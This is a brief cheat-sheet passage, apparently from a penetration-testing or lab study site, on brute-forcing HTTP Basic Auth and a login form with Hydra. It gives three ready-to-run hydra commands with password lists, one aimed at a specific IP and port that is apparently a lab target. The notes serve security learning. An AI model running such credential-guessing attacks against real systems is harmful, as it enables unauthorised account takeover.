Brute Force
Exploiting Basic Auth with Hydra
$ hydra -l user -P passwords.txt 127.0.0.1 http-get / -s 81❯ hydra -l basic-auth-user -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt 94.237.62.166 -s 53856 http-get /hydra -l admin -P /path/to/password_list.txt 127.0.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"Medusa
Last updated